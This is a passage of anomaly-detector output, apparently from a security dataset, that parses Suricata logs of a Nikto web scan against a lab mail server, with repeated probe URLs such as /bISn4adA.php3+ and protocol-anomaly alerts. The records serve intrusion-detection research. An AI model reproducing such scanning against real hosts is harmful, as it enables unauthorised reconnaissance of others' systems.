(Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.php3+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46804,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.php3+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.php3+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.php3+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.php3+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.php3+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", 
"/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.php3+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46804,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": 
"\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46804, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1233325612787490,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1233325612787490, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.192275+0000\",\"flow_id\":1233325612787490,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46804,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.php3+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.php3+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value 
combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.194298 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46806 -> 192.168.10.154:80", "/parser/model/time": 1583349514.194298, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46806, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.194298 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46806 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cs", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.194537+0000\",\"flow_id\":2223921164907347,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46806,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.194537, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2223921164907347,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46806,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": 
"\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46806,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cs\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cs\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cs", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", 
"/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cs", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46806,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 
3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46806, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2223921164907347,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2223921164907347, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.194537+0000\",\"flow_id\":2223921164907347,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46806,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", 
"AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.197206 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46808 -> 192.168.10.154:80", "/parser/model/time": 1583349514.197206, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46808, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.197206 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46808 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", 
"AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.tcl", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.197410+0000\",\"flow_id\":728237458783181,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46808,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tcl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tcl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.19741, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":728237458783181,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46808,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tcl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tcl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": 
"\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46808,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tcl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tcl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.tcl\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.tcl\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.tcl", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": 
"mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.tcl", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46808,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46808, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":728237458783181,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 728237458783181, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.197410+0000\",\"flow_id\":728237458783181,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46808,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tcl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tcl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, 
"AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.199492 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46810 -> 192.168.10.154:80", "/parser/model/time": 1583349514.199492, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46810, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.199492 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46810 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value 
